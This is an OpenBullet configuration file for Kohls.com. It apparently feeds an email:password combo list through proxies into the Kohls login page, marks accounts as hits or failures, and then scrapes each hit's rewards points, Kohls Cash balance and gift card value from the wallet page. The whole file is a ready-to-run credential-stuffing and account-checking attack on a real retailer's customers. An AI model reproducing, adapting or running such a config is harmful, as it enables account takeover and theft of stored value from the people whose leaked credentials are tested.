[SETTINGS]
{
  "Name": "Kohls",
  "SuggestedBots": 1,
  "LastModified": "2018-12-13T11:00:18.4817212+01:00",
  "AdditionalInfo": "",
  "Author": "FreakShock",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
BROWSERACTION Open "" 
IF "<ADDRESS>" EqualTo "https://www.kohls.com/myaccount/kohls_login.jsp"
JUMP #CLEAR_EMAIL
ENDIF

NAVIGATE "https://www.kohls.com/myaccount/kohls_login.jsp" 60 
#CLEAR_EMAIL ELEMENTACTION XPath "//*[@id=\"kiosk_loginEmail\"]" 
  Clear "" -> VAR "" 
#CLEAR_PASS ELEMENTACTION XPath "//*[@id=\"kiosk_loginPassword\"]" 
  Clear "" -> VAR "" 
#USER ELEMENTACTION XPath "//*[@id=\"kiosk_loginEmail\"]" 
  SendKeys "<USER>" -> VAR "" 
#PASS ELEMENTACTION XPath "//*[@id=\"kiosk_loginPassword\"]" 
  SendKeys "<PASS>" -> VAR "" 
#SUBMIT BROWSERACTION SendKeys "<ENTER>" 
BROWSERACTION SendKeys "<ENTER>" 
BROWSERACTION SendKeys "<ENTER>" 
#FAIL KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "password you entered has an error" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "setLoginSuccessCookie" 
#POINTS PARSE "<SOURCE>" LR "<span class=\"rewards-point\">" "</span>" Recursive=FALSE -> CAP "Points" "" "" 
#CASH PARSE "<SOURCE>" LR "<span class=\"kohlsCash-amount\">" "</span>" Recursive=FALSE -> CAP "Kohls Cash" "" "" 
NAVIGATE "https://www.kohls.com/wallet/my_wallet.jsp#gift-cards" 60 
FUNCTION Delay "1000" -> VAR "" 
ELEMENTACTION XPath "//*[@id=\"walletLoyalityUser\"]/div[4]/ul[1]/li[4]/a/span[2]" 
  GetText "" -> CAP "GC" 
BROWSERACTION ClearCookies "" 
BROWSERACTION Quit "" 
